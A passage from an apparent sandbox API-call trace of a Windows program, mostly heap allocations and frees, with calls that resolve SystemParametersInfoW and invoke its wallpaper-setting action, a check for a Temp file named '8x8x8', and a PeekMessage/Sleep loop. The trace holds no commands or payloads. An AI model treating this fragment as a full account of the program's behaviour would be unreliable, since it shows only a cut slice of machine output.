0x2e51ce8 [0272.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0272.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0272.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0272.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d30 [0272.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0272.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0272.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0272.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0272.613] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0272.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0272.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0272.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0272.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0272.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0272.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0272.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0272.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0272.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0272.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0272.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0272.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0272.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0272.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0272.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0272.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0272.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0272.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0272.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0272.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0272.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0272.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0272.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0272.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0272.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0272.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0272.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0272.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0272.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0272.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0272.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0272.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0272.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0272.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0272.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0272.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0272.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0272.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0272.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0272.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0272.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0272.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0272.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0272.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0272.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0272.616] LoadLibraryW (lpLibFileName="user32.dll") returned 0x750c0000 [0272.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0272.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0272.617] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0272.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x16) returned 0x2e69a28 [0272.617] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x2e69a28, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemParametersInfoW", lpUsedDefaultChar=0x0) returned 22 [0272.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0272.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54738 [0272.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0272.617] GetProcAddress (hModule=0x750c0000, lpProcName="SystemParametersInfoW") returned 0x750ef210 [0272.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54738 | out: hHeap=0x970000) returned 1 [0272.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0272.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0272.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0272.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0272.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0272.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0272.618] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0272.618] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0272.618] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0272.618] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0272.618] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0272.618] SystemParametersInfoW (in: uiAction=0x14, uiParam=0x0, pvParam=0x0, fWinIni=0x0 | out: pvParam=0x0) returned 1 [0272.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f15c40 [0272.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69bc8 [0272.689] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0272.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0272.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51eb0 [0272.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0272.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0272.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0272.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0272.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0272.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0272.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0272.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0272.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0272.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0272.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0272.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0272.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0272.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0272.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0272.690] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0272.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0272.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0272.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0272.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0272.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0272.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0272.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0272.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0272.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0272.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0272.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0272.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0272.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0272.691] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0272.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0272.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0272.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0272.691] FreeLibrary (hLibModule=0x750c0000) returned 1 [0272.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0272.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0272.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0272.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0272.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0272.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0272.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0272.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0272.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0272.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0272.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0272.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0272.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0272.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0272.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0272.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0272.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0272.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0272.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0272.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0272.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0272.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0272.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0272.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0272.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0272.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0272.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0272.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0272.694] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0272.694] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0272.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14488 [0272.694] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0272.694] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0272.694] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f15c40 | out: hHeap=0x970000) returned 1 [0272.694] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0272.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0272.694] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0272.694] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0272.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0272.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0272.694] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0272.694] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0272.695] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0272.695] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0272.695] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0272.695] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0272.695] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0272.695] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0272.695] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0272.695] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0272.695] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54760 | out: hHeap=0x970000) returned 1 [0272.695] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0272.695] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0272.695] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0272.695] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54580 | out: hHeap=0x970000) returned 1 [0272.695] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0272.695] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0272.695] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0272.695] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0272.695] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0272.695] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0272.695] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0272.695] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0272.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0272.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0272.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0272.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14488 | out: hHeap=0x970000) returned 1 [0272.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0272.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0272.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0272.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e546e8 | out: hHeap=0x970000) returned 1 [0272.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0272.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0272.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0272.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0272.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0272.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0272.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0272.696] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0272.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0272.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0272.696] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0272.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0272.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0272.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0272.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0272.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0272.697] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8cf3c0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0272.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0272.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x50) returned 0x2e54858 [0272.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0272.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0272.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0272.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0272.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xb0) returned 0x978270 [0272.697] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0272.697] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0272.697] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0272.697] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0272.697] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0272.697] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp/8x8x8" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\8x8x8")) returned 0x20 [0272.697] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978270 | out: hHeap=0x970000) returned 1 [0272.697] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0272.697] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0272.697] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0272.697] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0272.698] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0272.698] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0272.698] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0272.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0272.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0272.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0272.698] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0272.698] timeGetTime () returned 0x11845de [0272.698] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0272.698] Sleep (dwMilliseconds=0xa) [0272.771] timeGetTime () returned 0x1184628 [0272.771] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0272.771] Sleep (dwMilliseconds=0xa) [0272.823] timeGetTime () returned 0x118465c [0272.823] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0272.823] Sleep (dwMilliseconds=0xa) [0273.014] timeGetTime () returned 0x118471b [0273.014] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 